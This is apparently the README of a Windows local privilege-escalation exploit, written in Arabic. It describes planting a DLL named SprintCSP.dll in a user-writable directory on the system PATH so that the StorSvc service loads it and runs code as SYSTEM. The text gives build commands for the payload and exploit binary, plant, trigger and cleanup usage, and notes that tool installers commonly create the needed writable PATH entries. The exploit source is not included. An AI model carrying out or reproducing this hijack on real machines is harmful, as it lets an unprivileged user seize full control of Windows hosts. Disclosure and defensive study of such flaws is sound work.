
استغلال لتصعيد الامتيازات في Windows يزرع SprintCSP.dll في دليل HKLM PATH قابل للكتابة من قبل المستخدم لاختطاف StorSvc والتنفيذ بصلاحيات SYSTEM.
StorSvc يحمّل SprintCSP.dll بالاسم النسبي بصلاحيات SYSTEM. ضعها في دليل HKLM PATH قابل للكتابة من المستخدم، واحصل على SYSTEM.
يتطلب دليلاً قابلاً للكتابة من المستخدم في HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment\Path.
لا يوجد أي منها على صورة نظيفة. مثبّتات الأدوات تضيفها (%USERPROFILE%\.cargo\bin، .local\bin، Python Scripts). إذا لم يكن لدى الجهاز أي منها، فإن CVE-2026-69328.exe --setup ينشئ واحداً، وهو ما يتطلب مطالبة مسؤول لمرة واحدة. الاستغلال نفسه لا يحتاج إلى مسؤول أبداً.
GCC:
gcc payload.c -shared -o SprintCSP.dll
gcc CVE-2026-69328.c -lrpcrt4 -ladvapi32 -lshell32 -o CVE-2026-69328.exe
MSVC:
cl /LD payload.c /Fe:SprintCSP.dll
cl CVE-2026-69328.c rpcrt4.lib advapi32.lib shell32.lib /Fe:CVE-2026-69328.exe
CVE-2026-69328.exe plant, trigger, read proof
CVE-2026-69328.exe --cleanup remove proof file + planted DLL
يظهر الإثبات في C:\Windows\System32\CVE-2026-69328.txt.
ينهار StorSvc بعد التحميل ويعيد SCM تشغيله بعد ~120 ثانية.